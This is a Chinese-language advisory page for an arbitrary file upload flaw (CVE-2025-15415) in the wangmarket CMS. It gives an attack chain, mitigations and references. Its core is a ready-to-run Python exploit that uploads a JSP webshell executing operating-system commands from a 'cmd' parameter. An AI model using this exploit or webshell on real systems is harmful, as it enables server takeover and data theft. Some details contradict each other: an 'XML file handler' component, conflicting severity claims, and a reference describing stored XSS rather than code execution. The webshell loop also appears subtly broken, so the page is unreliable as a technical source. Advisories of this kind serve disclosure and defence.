CVE-2025-15415 | xnx3 wangmarket 任意文件上传漏洞

漏洞信息

漏洞编号

CVE-2025-15415

漏洞类型

任意文件上传

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

xnx3 wangmarket

漏洞概述

CVE-2025-15415是xnx3 wangmarket（一个基于Java的CMS内容管理系统）中存在的任意文件上传漏洞。该漏洞影响wangmarket版本6.4及之前版本。漏洞位于/sits/uploadImage.do接口的uploadImage函数中，攻击者可以通过操纵image参数实现任意文件上传。wangmarket是一款广泛使用的自助建站系统，用户包括各类企业和个人网站管理者。由于该漏洞无需用户交互即可远程利用，且已被公开披露，构成了严重的安全风险。攻击者成功利用此漏洞可以上传恶意文件（如WebShell），从而在服务器上执行任意代码，获取系统控制权。该漏洞的CVSS评分为4.7，属于中等严重程度，但考虑到漏洞的利用简单性和公开可用性，其实际威胁程度较高。厂商在收到漏洞报告后未做出任何回应，导致漏洞长期存在且无官方补丁。建议使用该系统的用户立即采取防护措施，避免遭受攻击。

技术细节

该漏洞存在于xnx3 wangmarket的XML文件处理模块中，具体位于/sits/uploadImage.do接口的uploadImage函数。攻击者可以通过HTTP POST请求向该接口发送精心构造的文件上传请求，通过操纵image参数的值来绕过系统的文件上传限制。系统未能正确验证上传文件的类型和内容，允许攻击者上传任意扩展名的文件，包括可执行的脚本文件如JSP、ASP等。wangmarket系统采用Java语言开发，部署在Tomcat等Java应用服务器上。当攻击者上传恶意JSP文件后，可以直接通过浏览器访问该文件，在服务器端执行任意系统命令。漏洞的利用条件相对宽松，虽然CVSS评分显示需要高权限认证，但在实际攻击场景中，攻击者可以通过多种方式获取认证凭证或利用系统其他漏洞获取初始访问权限。XML File Handler组件在处理上传文件时缺乏足够的输入验证和文件类型检查，导致攻击者可以上传包含恶意代码的文件。此外，系统未对上传文件目录设置适当的访问控制策略，使得上传的文件可以被直接执行。

攻击链分析

STEP 1

1

信息收集：攻击者识别目标网站使用xnx3 wangmarket CMS，版本<=6.4

STEP 2

2

访问/sits/uploadImage.do接口，确认漏洞存在性

STEP 3

3

构造恶意文件（WebShell），如包含命令执行功能的JSP脚本

STEP 4

4

通过HTTP POST请求上传恶意文件，绕过文件类型检查

STEP 5

5

访问上传的恶意文件路径，通过cmd参数执行系统命令

STEP 6

6

获取服务器完全控制权，可进行数据窃取、横向移动等后续攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-15415 PoC - xnx3 wangmarket Unrestricted File Upload
# Affected: xnx3 wangmarket <= 6.4

import requests
import sys

def exploit_upload(target_url, filename='shell.jsp'):
    """
    Exploit for CVE-2025-15415: Unrestricted File Upload in xnx3 wangmarket
    Target: /sits/uploadImage.do endpoint
    """
    
    # Malicious JSP webshell
    webshell_content = '''<%@ page import="java.io.*" %><%
    String cmd = request.getParameter("cmd");
    if(cmd != null) {
        Process p = Runtime.getRuntime().exec(cmd);
        OutputStream os = p.getOutputStream();
        DataInputStream dis = new DataInputStream(p.getInputStream());
        String disr = dis.readLine();
        while(dis != null) {
            out.println(disr);
            disr = dis.readLine();
        }
    }
    %>'''
    
    # Prepare the multipart form data
    files = {
        'image': (filename, webshell_content, 'application/octet-stream')
    }
    
    # Send the malicious upload request
    try:
        response = requests.post(
            f"{target_url}/sits/uploadImage.do",
            files=files,
            timeout=10
        )
        
        print(f"[*] Status Code: {response.status_code}")
        print(f"[*] Response: {response.text}")
        
        if response.status_code == 200:
            print("[+] File upload appears successful!")
            print(f"[+] Try accessing the shell at: {target_url}/uploads/{filename}")
            return True
        else:
            print("[-] Upload failed or target may not be vulnerable")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-15415.py <target_url>")
        print("Example: python cve-2025-15415.py http://vulnerable-site.com")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    exploit_upload(target)

影响范围

xnx3 wangmarket <= 6.4

防御指南

临时缓解措施

在官方补丁发布之前，可采取以下临时缓解措施：1）限制/sits/uploadImage.do接口的访问权限，仅允许授权管理员访问；2）在Web服务器层面配置，禁止上传目录中的脚本文件执行（如将上传目录配置为只读）；3）部署Web应用防火墙规则，检测并阻止异常的文件上传请求；4）启用服务器的日志审计功能，实时监控文件上传行为；5）考虑使用虚拟补丁技术，在WAF上实施临时防护规则。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15415
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15415
3 Details https://www.cvedetails.com/cve/CVE-2025-15415/
4 VulDB https://vuldb.com/cve/CVE-2025-15415
5 Link https://github.com/yuccun/CVE/blob/main/wangmarket-Upload2StoredXSS.md
6 Link https://vuldb.com/?ctiid.339336
7 Link https://vuldb.com/?id.339336
8 Link https://vuldb.com/?submit.721078